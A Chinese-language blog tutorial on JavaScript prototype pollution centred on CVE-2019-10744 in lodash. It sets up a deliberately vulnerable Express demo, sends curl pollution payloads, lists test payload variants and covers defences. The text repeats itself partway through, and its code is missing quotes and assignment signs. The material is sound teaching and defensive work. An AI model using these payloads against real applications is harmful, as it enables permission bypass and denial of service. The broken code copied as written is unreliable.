1. 项目概述为什么原型链污染值得每一个开发者警惕最近在复盘一些历史高危漏洞时我又把CVE-2019-10744翻出来研究了一遍。这个漏洞在当年影响了不少流行的JavaScript库核心问题就是“原型链污染”。说实话我第一次接触这个概念时也觉得有点绕但一旦理解了你就会发现它像一颗埋在代码深处的“定时炸弹”其影响范围和潜在危害远超很多人的想象。它不仅仅是某个库的特定bug更是一种由于JavaScript语言特性本身而广泛存在的攻击面。如果你写过JavaScript无论是Node.js后端还是复杂的前端应用都可能在不经意间引入这个风险。简单来说原型链污染攻击的核心是攻击者能够通过某种方式修改一个对象的原型Object.prototype从而影响所有继承自该原型的对象。想象一下你家里的总水阀被污染了那么每一个从这个总管道接出去的水龙头流出的水都会有问题。在JavaScript的世界里Object.prototype就是这个“总水阀”。一旦它被恶意添加或修改了属性那么程序中几乎所有普通对象都会“继承”这些被污染的属性可能导致拒绝服务、逻辑绕过甚至远程代码执行。CVE-2019-10744就是一个典型案例它影响了lodash、hoek等多个常用库的特定版本。攻击者通过精心构造的输入数据利用库中对象合并函数的缺陷成功将属性注入到Object.prototype中进而可能改变应用程序的行为逻辑。今天我们就来彻底拆解这个漏洞从JavaScript的原型继承机制讲起一步步还原攻击原理并最终落实到如何在代码中防御这类问题。无论你是安全研究员、后端开发还是全栈工程师理解并防范原型链污染都是提升代码安全性的必修课。2. 原型链污染漏洞的核心原理深度拆解要理解漏洞必须先吃透原理。原型链污染之所以能成立完全植根于JavaScript独特的原型继承机制。这部分内容可能有些基础但为了构建完整的认知体系我们有必要重新梳理一遍。2.1 JavaScript原型继承机制再回顾在经典的基于类的语言如Java中我们通过“类”来创建对象继承关系在类定义时就已经明确。而JavaScript采用了一种更为灵活有时也更令人困惑的机制——原型继承。每个JavaScript对象除了null都有一个内部属性[[Prototype]]我们可以通过__proto__或Object.getPrototypeOf()来访问。当你试图访问一个对象的属性时如果该对象自身没有这个属性JavaScript引擎就会去它的[[Prototype]]指向的对象上查找如果还没有就继续沿着[[Prototype]]链向上查找直到找到属性或到达链条末端null。这条查找路径就是所谓的“原型链”。// 一个简单的例子 let animal { eats: true }; let rabbit { jumps: true }; // 设置 rabbit 的原型为 animal rabbit.__proto__ animal; // 实际开发中更推荐使用 Object.setPrototypeOf // 现在 rabbit 可以访问到 animal 的属性 console.log(rabbit.jumps); // true (自身属性) console.log(rabbit.eats); // true (从原型继承)关键在于Object.prototype位于几乎所有对象原型链的顶端。通过字面量{}创建的对象其原型默认就是Object.prototype。let obj {}; console.log(obj.__proto__ Object.prototype); // true console.log(obj.toString); // function toString() { [native code] } 来自 Object.prototype这就意味着如果我们在Object.prototype上添加或修改一个属性那么几乎所有普通对象都会受到影响。// 污染 Object.prototype Object.prototype.polluted I am everywhere!; let innocentObject {}; console.log(innocentObject.polluted); // I am everywhere!攻击者的目标就是找到一条路径能够将可控的数据写入到Object.prototype或其他在原型链上游的对象的某个属性中。2.2 污染路径是如何被打通的——以对象合并函数为例在正常的业务逻辑中我们很少会直接去操作__proto__。漏洞通常发生在那些处理用户输入、并动态合并或复制对象的函数中。最常见的高危函数就是“对象合并”merge/assign/extend。一个存在缺陷的合并函数可能长这样function merge(target, source) { for (let key in source) { // 缺陷没有检查 key 是否是对象自身的可枚举属性也没有过滤 __proto__ 等特殊属性 target[key] source[key]; } return target; }这个函数遍历source对象的所有可枚举属性包括从原型链继承来的并将其复制到target对象上。看起来没问题但考虑一下这个攻击载荷let maliciousPayload JSON.parse({__proto__: {polluted: true}}); // 或者更直接地构造对象 let maliciousPayload {}; maliciousPayload.__proto__ { polluted: true }; let config {}; merge(config, maliciousPayload);在for...in循环中key的值会是__proto__。当执行target[key] source[key]时如果target是一个普通对象target[__proto__]这个赋值操作在某些JavaScript引擎和运行环境下可能会被解释为“设置target对象的原型”而不是给target添加一个名为__proto__的自有属性。这就直接修改了config对象的原型。然而在现代JavaScript引擎中直接对__proto__属性赋值的行为是相对规范的不一定总能成功污染原型。攻击者更常用的是一种“路径遍历”式的技巧利用的是属性访问的“点表示法”和“括号表示法”的解析差异。真正的攻击载荷往往是这样构造的let maliciousPayload JSON.parse({constructor: {prototype: {polluted: true}}}); // 或者 let maliciousPayload { constructor.prototype.polluted: true }; // 需要合并函数支持路径解析关键在于有缺陷的合并函数可能会递归地处理这样的键名。例如一个库可能实现了一个“深合并”功能它看到constructor.prototype.polluted这个键会试图将其拆解为constructor-prototype-polluted的访问路径。如果这个库没有对constructor和prototype这样的关键属性进行过滤它最终的操作就等价于target.constructor.prototype.polluted true;由于target是一个普通对象target.constructor指向Object构造函数Object.prototype就是所有对象的原型。于是polluted: true就被成功注入到了Object.prototype中。这就是CVE-2019-10744等漏洞的典型利用方式。2.3 CVE-2019-10744 漏洞具体分析CVE-2019-10744主要影响lodash库版本 4.17.12中的_.defaultsDeep函数。_.defaultsDeep函数的作用是递归地将源对象的属性分配给目标对象如果目标对象缺少对应的属性。漏洞存在于其属性分配逻辑中。当处理像constructor.prototype.polluted这样的属性路径时lodash的底层函数baseSet会使用一个castPath函数将字符串路径转换为数组如[constructor, prototype, polluted]然后递归地访问对象最终在原型对象上执行赋值操作。攻击者可以构造如下恶意输入const _ require(lodash); // 版本 4.17.12 const maliciousObject JSON.parse({constructor: {prototype: {polluted: yes}}}); _.defaultsDeep({}, maliciousObject); console.log({}.polluted); // 输出 yes 污染成功在这个例子中空对象{}自身没有polluted属性于是沿着原型链查找在Object.prototype上找到了被注入的属性证明污染成功。污染成功后任何新创建的或已有的普通对象都会带有这个polluted属性可能被后续的业务逻辑所使用导致不可预期的行为。注意这里需要明确直接使用JSON.parse解析__proto__在现代Node.js环境中通常不会导致原型污染因为JSON解析器会将__proto__视为一个普通的字符串键。漏洞利用依赖于库自身递归合并逻辑的缺陷。因此单纯过滤__proto__字符串是不够的必须防范通过constructor.prototype等路径进行的原型修改。3. 实战复现亲手触发一个原型链污染理解了原理最好的验证方式就是亲手复现。我们不在真实生产环境测试而是搭建一个简单的、存在漏洞的Node.js演示应用。3.1 搭建漏洞演示环境首先我们创建一个新的目录并初始化项目故意安装一个有漏洞的lodash版本。mkdir prototype-pollution-demo cd prototype-pollution-demo npm init -y npm install lodash4.17.11 # 这是受CVE-2019-10744影响的版本接下来创建一个简单的Express服务器它提供一个API用于合并用户提供的配置。// server.js const express require(express); const _ require(lodash); // 版本 4.17.11 const app express(); const port 3000; app.use(express.json()); // 用于解析JSON请求体 // 一个存在漏洞的配置合并端点 app.post(/merge-config, (req, res) { const userConfig req.body.config || {}; const defaultConfig { theme: light, permissions: { read: true, write: false } }; // 危险操作使用存在漏洞的 _.defaultsDeep 合并用户输入 const finalConfig _.defaultsDeep({}, userConfig, defaultConfig); // 假设这里根据配置进行某些操作... // 例如检查一个本应只有默认配置才有的属性 if (finalConfig.pollutedCheck) { console.warn(异常pollutedCheck属性不应存在); } res.json({ message: 配置合并成功, config: finalConfig }); }); // 另一个端点用于展示污染后果 app.get(/check-pollution, (req, res) { // 创建一个全新的对象 const testObj {}; // 检查它是否被污染 const isPolluted polluted in testObj; const pollutionValue testObj.polluted; res.json({ isPolluted, pollutionValue, prototypeHasKey: polluted in Object.prototype }); }); app.listen(port, () { console.log(漏洞演示服务器运行在 http://localhost:${port}); });3.2 发起污染攻击启动服务器node server.js。首先我们发送一个正常的请求看看合并功能如何工作curl -X POST http://localhost:3000/merge-config \ -H Content-Type: application/json \ -d {config: {theme: dark}}响应会显示合并后的配置theme变成了dark其他值使用默认值。一切正常。现在发送恶意载荷进行原型链污染攻击curl -X POST http://localhost:3000/merge-config \ -H Content-Type: application/json \ -d { config: { constructor: { prototype: { polluted: hacked, pollutedCheck: true } } } }这个请求会触发_.defaultsDeep的漏洞。服务器可能会返回一个看似正常的响应。关键步骤来了调用另一个端点检查污染是否成功。curl http://localhost:3000/check-pollution你会看到类似这样的响应{ isPolluted: true, pollutionValue: hacked, prototypeHasKey: true }这证明Object.prototype已经被成功污染属性polluted和pollutedCheck被添加到了所有对象上。3.3 污染可能引发的实际危害污染成功只是第一步关键在于攻击者如何利用这个状态。危害场景多种多样拒绝服务DoS如果污染的属性被用于条件判断可能改变程序逻辑流。例如污染一个isAdmin属性为false可能导致所有用户无法进行管理操作或者污染一个toString方法使其抛出异常导致整个应用崩溃。// 攻击者污染了 toString Object.prototype.toString function() { throw new Error(Crashed!); }; // 任何尝试将对象转为字符串的操作都会崩溃 try { console.log({}.toString()); } catch(e) { console.error(e); }逻辑绕过这是更危险的情况。假设应用中有如下代码function checkPermission(user) { // 默认所有用户都没有admin权限 if (!user.isAdmin) { return false; } // ... 其他检查 return true; }如果Object.prototype.isAdmin被污染为true那么对于任何没有显式定义isAdmin: false的user对象!user.isAdmin都会为false因为user.isAdmin会从原型链找到true从而绕过权限检查远程代码执行RCE在某些特定场景下原型链污染可能与其他漏洞结合导致RCE。例如如果一个模板引擎如Pug/Jade、Handlebars使用被污染的对象作为上下文并且该引擎允许执行动态代码攻击者可能通过污染模板引擎的配置或辅助函数来注入恶意代码。又或者如果存在命令注入漏洞而命令参数来自一个可被污染的对象属性攻击者就能控制执行的命令。实操心得在复现过程中我发现不同Node.js版本和JavaScript引擎对原型操作的行为有细微差别。例如直接对__proto__赋值的行为在较新版本中受到更多限制。因此在实际漏洞挖掘中不能只测试一种载荷需要尝试多种变体如constructor.prototype、__proto__.constructor.prototype等。同时要密切关注目标应用使用了哪些第三方库并查找这些库是否存在已知的、存在原型污染漏洞的函数如lodash.merge、lodash.defaultsDeep、hoek的applyToDefaults等。4. 全面防御从编码习惯到运行时加固知道了漏洞如何产生防御就有了明确的方向。防御原型链污染需要多层次、纵深化的策略从代码编写的第一行开始到应用上线运行都需要保持警惕。4.1 安全的编码实践与库函数使用这是最根本、最有效的防御层。1. 升级与修补首先立即检查并升级项目依赖。对于CVE-2019-10744将lodash升级到4.17.12即可修复。使用npm audit或yarn audit定期扫描依赖漏洞是基本操作。2. 使用对象合并的安全替代方案如果业务中必须进行对象合并请优先选择以下安全方案使用最新的、已修复的库函数确保使用的lodash.merge、Object.assign等函数来自已修复漏洞的版本。使用Object.assign进行浅合并Object.assign只复制对象自身的可枚举属性不会遍历原型链因此天然免疫基于原型链遍历的污染。但它只做浅拷贝。const safeConfig Object.assign({}, defaultConfig, userConfig);使用展开运算符...这也是浅合并同样安全。const safeConfig { ...defaultConfig, ...userConfig };实现或使用安全的深合并函数如果必须深合并要么使用库确认其安全要么自己实现。一个安全深合并的关键在于过滤特殊属性在递归过程中明确拒绝处理键名为__proto__、constructor、prototype的属性。使用Object.hasOwnProperty检查只处理对象自身的属性不遍历原型链上的属性。function safeDeepMerge(target, source) { if (!source || typeof source ! object) return target; for (let key in source) { // 关键只处理源对象自身的属性并过滤危险键名 if (source.hasOwnProperty(key) ![__proto__, constructor, prototype].includes(key)) { if (source[key] typeof source[key] object !Array.isArray(source[key])) { // 递归合并对象 if (!target[key] || typeof target[key] ! object) { target[key] {}; } safeDeepMerge(target[key], source[key]); } else { // 直接赋值基本类型或数组 target[key] source[key]; } } } return target; }3. 冻结Object.prototype激进但有效在应用启动的入口处可以尝试冻结Object.prototype防止其被修改。但这是一种非常激进的做法可能会破坏某些依赖原型扩展的库。Object.freeze(Object.prototype); // 或者更温和的防止添加新属性但允许修改现有属性 Object.seal(Object.prototype);注意这种做法需要极其谨慎必须在充分测试后进行因为它是一个全局性的、不可逆的操作。4.2 输入验证与数据净化永远不要信任用户输入。对于任何来自外部的数据HTTP请求参数、请求体、查询字符串、文件上传内容等在用于可能触发原型链污染的操作如对象合并、eval、动态属性访问之前必须进行严格的验证和净化。1. 结构验证使用JSON Schema等工具定义数据结构的严格契约。明确指定允许的字段名、类型和嵌套结构拒绝任何不符合契约的数据。const Ajv require(ajv); const ajv new Ajv(); const schema { type: object, properties: { theme: { type: string, enum: [light, dark] }, permissions: { type: object, properties: { read: { type: boolean }, write: { type: boolean } }, additionalProperties: false // 禁止额外属性 } }, additionalProperties: false // 禁止根级别的额外属性 }; const validate ajv.compile(schema); if (!validate(userInput)) { throw new Error(无效的输入数据); } // 只有通过验证的数据才进行后续操作2. 属性名过滤在将用户数据传入敏感函数前遍历数据的所有键名删除或拒绝包含敏感序列如__proto__、constructor、prototype的键。注意这里需要递归地检查嵌套对象。function sanitizeObject(obj) { const dangerousKeys [__proto__, constructor, prototype]; function traverse(current) { if (current typeof current object) { Object.keys(current).forEach(key { // 如果键名危险则删除 if (dangerousKeys.includes(key)) { delete current[key]; } else if (current[key] typeof current[key] object) { // 递归处理嵌套对象 traverse(current[key]); } }); } } const cloned JSON.parse(JSON.stringify(obj)); // 深拷贝避免修改原数据 traverse(cloned); return cloned; }4.3 运行时检测与监控即使采取了预防措施运行时监控也能作为最后一道防线。1. 原型污染检测脚本可以在测试环境或关键业务入口周期性地检查Object.prototype是否被添加了异常属性。// 记录初始的 Object.prototype 键名 const initialProtoKeys Object.keys(Object.prototype); function checkForPollution() { const currentKeys Object.keys(Object.prototype); const newKeys currentKeys.filter(key !initialProtoKeys.includes(key)); if (newKeys.length 0) { console.error([警报] 检测到原型链污染新增属性: ${newKeys.join(, )}); // 触发警报发送邮件、Slack消息、写入安全日志等 // 注意不要在生产环境直接 console.error应使用日志系统 } } // 定期执行例如每10分钟一次 setInterval(checkForPollution, 10 * 60 * 1000);2. 使用安全模式或沙箱对于处理高度不可信数据的代码段可以考虑在独立的上下文中运行。Node.js中可以使用vm模块创建沙箱但vm模块本身也并非绝对安全需要仔细配置。更好的选择是使用进程隔离如通过child_process.fork或容器化技术来运行不可信的代码逻辑。4.4 依赖管理与安全审计1. 自动化依赖检查将安全审计集成到开发流程中在CI/CD流水线中加入npm audit --audit-levelhigh或yarn audit发现高危漏洞则阻断构建。使用GitHub Dependabot、Snyk等工具自动创建依赖更新PR。2. 最小化依赖定期审视package.json移除不再使用的依赖。依赖越少攻击面越小。对于像lodash这样的大型库考虑是否真的需要全部功能或许可以使用lodash.merge这样的独立包或者使用更轻量的替代方案。3. 代码审查关注点在代码审查中将“对象合并操作”作为重点审查项目。审查者需要问这里合并的数据来源是否可信使用的合并函数是否安全是Object.assign还是存在漏洞的深合并是否对输入数据进行了验证和净化5. 常见问题与排查技巧实录在实际开发和应急响应中你可能会遇到各种与原型链污染相关的问题。下面是我总结的一些常见场景和排查思路。5.1 如何判断应用是否存在原型链污染漏洞代码静态分析白盒搜索关键函数在代码库中全局搜索merge、extend、assign、defaultsDeep、cloneDeep、_.merge、Object.assign等关键词。跟踪数据流对于找到的每个合并函数向上追溯其源数据source是否来自用户可控的输入如req.body、req.query、req.params、上传的文件内容、第三方API返回的不可信数据等。检查过滤逻辑查看合并函数内部或调用前是否对数据的键名进行了有效的过滤检查__proto__、constructor、prototype等。检查库版本确认使用的第三方库特别是lodash、hoek、jQuery等是否为存在已知原型污染漏洞的版本。动态测试黑盒/灰盒模糊测试Fuzzing针对接受JSON或类似结构化数据的API端点发送包含可疑键名的测试载荷。测试载荷示例{__proto__: {polluted: test}} {constructor: {prototype: {polluted: test}}} {a: {__proto__: {polluted: test}}} {a: {constructor: {prototype: {polluted: test}}}}观察响应发送测试载荷后观察应用行为是否有异常如错误日志、崩溃。同时尝试访问应用的其他功能看是否有逻辑被改变例如原本没有的权限突然有了。直接检测如果可能在测试后调用一个能返回新创建对象属性的接口检查是否出现了测试载荷中注入的属性名。5.2 发现疑似污染后如何应急处理立即隔离如果确认存在漏洞且可能被利用考虑暂时下线受影响的服务或API端点防止进一步损害。排查污染范围检查Object.prototype以及其他可能被污染的内建原型如Array.prototype、Function.prototype。使用上文提到的检测脚本列出所有新增属性。清理污染在修复漏洞根源之前可以尝试在内存中清理污染。但请注意这不能修复已被篡改的业务逻辑状态。// 删除在 Object.prototype 上新增的属性 const pollutedKeys Object.keys(Object.prototype).filter(key !initialProtoKeys.includes(key)); pollutedKeys.forEach(key delete Object.prototype[key]);警告如果攻击者污染的是已有方法如toString、valueOf直接delete可能会破坏功能可能需要从备份中恢复。根因修复升级依赖立即将存在漏洞的第三方库升级到安全版本。修复代码如果漏洞存在于自身代码中用安全的合并函数替换不安全的函数并添加强制的输入验证。回溯与审计查看日志尝试确定攻击发生的时间、来源和具体载荷。审计在污染发生期间是否有敏感操作被执行。5.3 使用Object.create(null)能完全免疫吗这是一个常见的误解。Object.create(null)会创建一个没有原型即[[Prototype]]为null的对象。这个对象本身确实不会受到Object.prototype污染的影响因为它根本不继承自Object.prototype。const pureObject Object.create(null); pureObject.a 1; console.log(pureObject.toString); // undefined // 即使 Object.prototype 被污染pureObject 也不会受到影响但是这并不能提供完全免疫污染依然存在Object.prototype仍然被污染了应用中其他成千上万的普通对象{}依然会受影响。库函数内部可能创建普通对象即使你传入Object.create(null)的对象给一个库函数该函数内部可能仍然会使用{}字面量创建新对象这些新对象会被污染。污染可以发生在其他原型上攻击者可能污染Array.prototype、Function.prototype或者某个特定构造函数的原型。Object.create(null)只对Object.prototype免疫。因此Object.create(null)是一种有用的防御性编码实践特别是在创建用作字典键值对的对象时可以避免与原型上的属性名冲突并免疫基于Object.prototype的污染。但它不是解决原型链污染漏洞的银弹必须与输入验证、安全合并等主要手段结合使用。5.4 现代前端框架React, Vue是否受影响现代前端框架本身的设计在一定程度上降低了风险但风险并未消失。ReactReact组件的状态state和属性props的管理相对封闭通常不涉及直接使用易受攻击的深合并函数去合并不可信数据。但是如果在处理state或与全局状态管理库如Redux交互时不慎使用了不安全的_.merge来合并来自API响应的数据风险依然存在。Redux的reducer中应使用纯函数和不可变更新避免直接修改或深度合并状态。VueVue 2.x的Vue.set和Vue.util.extend以及Vue 3的响应式系统内部对数据操作有一定封装。但开发者如果在data函数、computed属性或方法中手动执行不安全的对象合并操作同样会引入漏洞。特别是在处理Vuex的state更新时需要注意。核心原则不变无论使用什么框架只要你的JavaScript代码执行了“将不可信数据深度合并到一个对象中”这个操作并且没有进行正确的防护原型链污染的风险就存在。框架只是提供了不同的数据管理范式并不能自动消除这类底层语言特性导致的安全问题。在前端污染的影响可能包括破坏其他组件的渲染逻辑、触发意外的生命周期钩子、或与第三方库发生冲突。
深入解析JavaScript原型链污染:原理、危害与防御实战
发布时间:2026/6/30 5:30:19
1. 项目概述为什么原型链污染值得每一个开发者警惕最近在复盘一些历史高危漏洞时我又把CVE-2019-10744翻出来研究了一遍。这个漏洞在当年影响了不少流行的JavaScript库核心问题就是“原型链污染”。说实话我第一次接触这个概念时也觉得有点绕但一旦理解了你就会发现它像一颗埋在代码深处的“定时炸弹”其影响范围和潜在危害远超很多人的想象。它不仅仅是某个库的特定bug更是一种由于JavaScript语言特性本身而广泛存在的攻击面。如果你写过JavaScript无论是Node.js后端还是复杂的前端应用都可能在不经意间引入这个风险。简单来说原型链污染攻击的核心是攻击者能够通过某种方式修改一个对象的原型Object.prototype从而影响所有继承自该原型的对象。想象一下你家里的总水阀被污染了那么每一个从这个总管道接出去的水龙头流出的水都会有问题。在JavaScript的世界里Object.prototype就是这个“总水阀”。一旦它被恶意添加或修改了属性那么程序中几乎所有普通对象都会“继承”这些被污染的属性可能导致拒绝服务、逻辑绕过甚至远程代码执行。CVE-2019-10744就是一个典型案例它影响了lodash、hoek等多个常用库的特定版本。攻击者通过精心构造的输入数据利用库中对象合并函数的缺陷成功将属性注入到Object.prototype中进而可能改变应用程序的行为逻辑。今天我们就来彻底拆解这个漏洞从JavaScript的原型继承机制讲起一步步还原攻击原理并最终落实到如何在代码中防御这类问题。无论你是安全研究员、后端开发还是全栈工程师理解并防范原型链污染都是提升代码安全性的必修课。2. 原型链污染漏洞的核心原理深度拆解要理解漏洞必须先吃透原理。原型链污染之所以能成立完全植根于JavaScript独特的原型继承机制。这部分内容可能有些基础但为了构建完整的认知体系我们有必要重新梳理一遍。2.1 JavaScript原型继承机制再回顾在经典的基于类的语言如Java中我们通过“类”来创建对象继承关系在类定义时就已经明确。而JavaScript采用了一种更为灵活有时也更令人困惑的机制——原型继承。每个JavaScript对象除了null都有一个内部属性[[Prototype]]我们可以通过__proto__或Object.getPrototypeOf()来访问。当你试图访问一个对象的属性时如果该对象自身没有这个属性JavaScript引擎就会去它的[[Prototype]]指向的对象上查找如果还没有就继续沿着[[Prototype]]链向上查找直到找到属性或到达链条末端null。这条查找路径就是所谓的“原型链”。// 一个简单的例子 let animal { eats: true }; let rabbit { jumps: true }; // 设置 rabbit 的原型为 animal rabbit.__proto__ animal; // 实际开发中更推荐使用 Object.setPrototypeOf // 现在 rabbit 可以访问到 animal 的属性 console.log(rabbit.jumps); // true (自身属性) console.log(rabbit.eats); // true (从原型继承)关键在于Object.prototype位于几乎所有对象原型链的顶端。通过字面量{}创建的对象其原型默认就是Object.prototype。let obj {}; console.log(obj.__proto__ Object.prototype); // true console.log(obj.toString); // function toString() { [native code] } 来自 Object.prototype这就意味着如果我们在Object.prototype上添加或修改一个属性那么几乎所有普通对象都会受到影响。// 污染 Object.prototype Object.prototype.polluted I am everywhere!; let innocentObject {}; console.log(innocentObject.polluted); // I am everywhere!攻击者的目标就是找到一条路径能够将可控的数据写入到Object.prototype或其他在原型链上游的对象的某个属性中。2.2 污染路径是如何被打通的——以对象合并函数为例在正常的业务逻辑中我们很少会直接去操作__proto__。漏洞通常发生在那些处理用户输入、并动态合并或复制对象的函数中。最常见的高危函数就是“对象合并”merge/assign/extend。一个存在缺陷的合并函数可能长这样function merge(target, source) { for (let key in source) { // 缺陷没有检查 key 是否是对象自身的可枚举属性也没有过滤 __proto__ 等特殊属性 target[key] source[key]; } return target; }这个函数遍历source对象的所有可枚举属性包括从原型链继承来的并将其复制到target对象上。看起来没问题但考虑一下这个攻击载荷let maliciousPayload JSON.parse({__proto__: {polluted: true}}); // 或者更直接地构造对象 let maliciousPayload {}; maliciousPayload.__proto__ { polluted: true }; let config {}; merge(config, maliciousPayload);在for...in循环中key的值会是__proto__。当执行target[key] source[key]时如果target是一个普通对象target[__proto__]这个赋值操作在某些JavaScript引擎和运行环境下可能会被解释为“设置target对象的原型”而不是给target添加一个名为__proto__的自有属性。这就直接修改了config对象的原型。然而在现代JavaScript引擎中直接对__proto__属性赋值的行为是相对规范的不一定总能成功污染原型。攻击者更常用的是一种“路径遍历”式的技巧利用的是属性访问的“点表示法”和“括号表示法”的解析差异。真正的攻击载荷往往是这样构造的let maliciousPayload JSON.parse({constructor: {prototype: {polluted: true}}}); // 或者 let maliciousPayload { constructor.prototype.polluted: true }; // 需要合并函数支持路径解析关键在于有缺陷的合并函数可能会递归地处理这样的键名。例如一个库可能实现了一个“深合并”功能它看到constructor.prototype.polluted这个键会试图将其拆解为constructor-prototype-polluted的访问路径。如果这个库没有对constructor和prototype这样的关键属性进行过滤它最终的操作就等价于target.constructor.prototype.polluted true;由于target是一个普通对象target.constructor指向Object构造函数Object.prototype就是所有对象的原型。于是polluted: true就被成功注入到了Object.prototype中。这就是CVE-2019-10744等漏洞的典型利用方式。2.3 CVE-2019-10744 漏洞具体分析CVE-2019-10744主要影响lodash库版本 4.17.12中的_.defaultsDeep函数。_.defaultsDeep函数的作用是递归地将源对象的属性分配给目标对象如果目标对象缺少对应的属性。漏洞存在于其属性分配逻辑中。当处理像constructor.prototype.polluted这样的属性路径时lodash的底层函数baseSet会使用一个castPath函数将字符串路径转换为数组如[constructor, prototype, polluted]然后递归地访问对象最终在原型对象上执行赋值操作。攻击者可以构造如下恶意输入const _ require(lodash); // 版本 4.17.12 const maliciousObject JSON.parse({constructor: {prototype: {polluted: yes}}}); _.defaultsDeep({}, maliciousObject); console.log({}.polluted); // 输出 yes 污染成功在这个例子中空对象{}自身没有polluted属性于是沿着原型链查找在Object.prototype上找到了被注入的属性证明污染成功。污染成功后任何新创建的或已有的普通对象都会带有这个polluted属性可能被后续的业务逻辑所使用导致不可预期的行为。注意这里需要明确直接使用JSON.parse解析__proto__在现代Node.js环境中通常不会导致原型污染因为JSON解析器会将__proto__视为一个普通的字符串键。漏洞利用依赖于库自身递归合并逻辑的缺陷。因此单纯过滤__proto__字符串是不够的必须防范通过constructor.prototype等路径进行的原型修改。3. 实战复现亲手触发一个原型链污染理解了原理最好的验证方式就是亲手复现。我们不在真实生产环境测试而是搭建一个简单的、存在漏洞的Node.js演示应用。3.1 搭建漏洞演示环境首先我们创建一个新的目录并初始化项目故意安装一个有漏洞的lodash版本。mkdir prototype-pollution-demo cd prototype-pollution-demo npm init -y npm install lodash4.17.11 # 这是受CVE-2019-10744影响的版本接下来创建一个简单的Express服务器它提供一个API用于合并用户提供的配置。// server.js const express require(express); const _ require(lodash); // 版本 4.17.11 const app express(); const port 3000; app.use(express.json()); // 用于解析JSON请求体 // 一个存在漏洞的配置合并端点 app.post(/merge-config, (req, res) { const userConfig req.body.config || {}; const defaultConfig { theme: light, permissions: { read: true, write: false } }; // 危险操作使用存在漏洞的 _.defaultsDeep 合并用户输入 const finalConfig _.defaultsDeep({}, userConfig, defaultConfig); // 假设这里根据配置进行某些操作... // 例如检查一个本应只有默认配置才有的属性 if (finalConfig.pollutedCheck) { console.warn(异常pollutedCheck属性不应存在); } res.json({ message: 配置合并成功, config: finalConfig }); }); // 另一个端点用于展示污染后果 app.get(/check-pollution, (req, res) { // 创建一个全新的对象 const testObj {}; // 检查它是否被污染 const isPolluted polluted in testObj; const pollutionValue testObj.polluted; res.json({ isPolluted, pollutionValue, prototypeHasKey: polluted in Object.prototype }); }); app.listen(port, () { console.log(漏洞演示服务器运行在 http://localhost:${port}); });3.2 发起污染攻击启动服务器node server.js。首先我们发送一个正常的请求看看合并功能如何工作curl -X POST http://localhost:3000/merge-config \ -H Content-Type: application/json \ -d {config: {theme: dark}}响应会显示合并后的配置theme变成了dark其他值使用默认值。一切正常。现在发送恶意载荷进行原型链污染攻击curl -X POST http://localhost:3000/merge-config \ -H Content-Type: application/json \ -d { config: { constructor: { prototype: { polluted: hacked, pollutedCheck: true } } } }这个请求会触发_.defaultsDeep的漏洞。服务器可能会返回一个看似正常的响应。关键步骤来了调用另一个端点检查污染是否成功。curl http://localhost:3000/check-pollution你会看到类似这样的响应{ isPolluted: true, pollutionValue: hacked, prototypeHasKey: true }这证明Object.prototype已经被成功污染属性polluted和pollutedCheck被添加到了所有对象上。3.3 污染可能引发的实际危害污染成功只是第一步关键在于攻击者如何利用这个状态。危害场景多种多样拒绝服务DoS如果污染的属性被用于条件判断可能改变程序逻辑流。例如污染一个isAdmin属性为false可能导致所有用户无法进行管理操作或者污染一个toString方法使其抛出异常导致整个应用崩溃。// 攻击者污染了 toString Object.prototype.toString function() { throw new Error(Crashed!); }; // 任何尝试将对象转为字符串的操作都会崩溃 try { console.log({}.toString()); } catch(e) { console.error(e); }逻辑绕过这是更危险的情况。假设应用中有如下代码function checkPermission(user) { // 默认所有用户都没有admin权限 if (!user.isAdmin) { return false; } // ... 其他检查 return true; }如果Object.prototype.isAdmin被污染为true那么对于任何没有显式定义isAdmin: false的user对象!user.isAdmin都会为false因为user.isAdmin会从原型链找到true从而绕过权限检查远程代码执行RCE在某些特定场景下原型链污染可能与其他漏洞结合导致RCE。例如如果一个模板引擎如Pug/Jade、Handlebars使用被污染的对象作为上下文并且该引擎允许执行动态代码攻击者可能通过污染模板引擎的配置或辅助函数来注入恶意代码。又或者如果存在命令注入漏洞而命令参数来自一个可被污染的对象属性攻击者就能控制执行的命令。实操心得在复现过程中我发现不同Node.js版本和JavaScript引擎对原型操作的行为有细微差别。例如直接对__proto__赋值的行为在较新版本中受到更多限制。因此在实际漏洞挖掘中不能只测试一种载荷需要尝试多种变体如constructor.prototype、__proto__.constructor.prototype等。同时要密切关注目标应用使用了哪些第三方库并查找这些库是否存在已知的、存在原型污染漏洞的函数如lodash.merge、lodash.defaultsDeep、hoek的applyToDefaults等。4. 全面防御从编码习惯到运行时加固知道了漏洞如何产生防御就有了明确的方向。防御原型链污染需要多层次、纵深化的策略从代码编写的第一行开始到应用上线运行都需要保持警惕。4.1 安全的编码实践与库函数使用这是最根本、最有效的防御层。1. 升级与修补首先立即检查并升级项目依赖。对于CVE-2019-10744将lodash升级到4.17.12即可修复。使用npm audit或yarn audit定期扫描依赖漏洞是基本操作。2. 使用对象合并的安全替代方案如果业务中必须进行对象合并请优先选择以下安全方案使用最新的、已修复的库函数确保使用的lodash.merge、Object.assign等函数来自已修复漏洞的版本。使用Object.assign进行浅合并Object.assign只复制对象自身的可枚举属性不会遍历原型链因此天然免疫基于原型链遍历的污染。但它只做浅拷贝。const safeConfig Object.assign({}, defaultConfig, userConfig);使用展开运算符...这也是浅合并同样安全。const safeConfig { ...defaultConfig, ...userConfig };实现或使用安全的深合并函数如果必须深合并要么使用库确认其安全要么自己实现。一个安全深合并的关键在于过滤特殊属性在递归过程中明确拒绝处理键名为__proto__、constructor、prototype的属性。使用Object.hasOwnProperty检查只处理对象自身的属性不遍历原型链上的属性。function safeDeepMerge(target, source) { if (!source || typeof source ! object) return target; for (let key in source) { // 关键只处理源对象自身的属性并过滤危险键名 if (source.hasOwnProperty(key) ![__proto__, constructor, prototype].includes(key)) { if (source[key] typeof source[key] object !Array.isArray(source[key])) { // 递归合并对象 if (!target[key] || typeof target[key] ! object) { target[key] {}; } safeDeepMerge(target[key], source[key]); } else { // 直接赋值基本类型或数组 target[key] source[key]; } } } return target; }3. 冻结Object.prototype激进但有效在应用启动的入口处可以尝试冻结Object.prototype防止其被修改。但这是一种非常激进的做法可能会破坏某些依赖原型扩展的库。Object.freeze(Object.prototype); // 或者更温和的防止添加新属性但允许修改现有属性 Object.seal(Object.prototype);注意这种做法需要极其谨慎必须在充分测试后进行因为它是一个全局性的、不可逆的操作。4.2 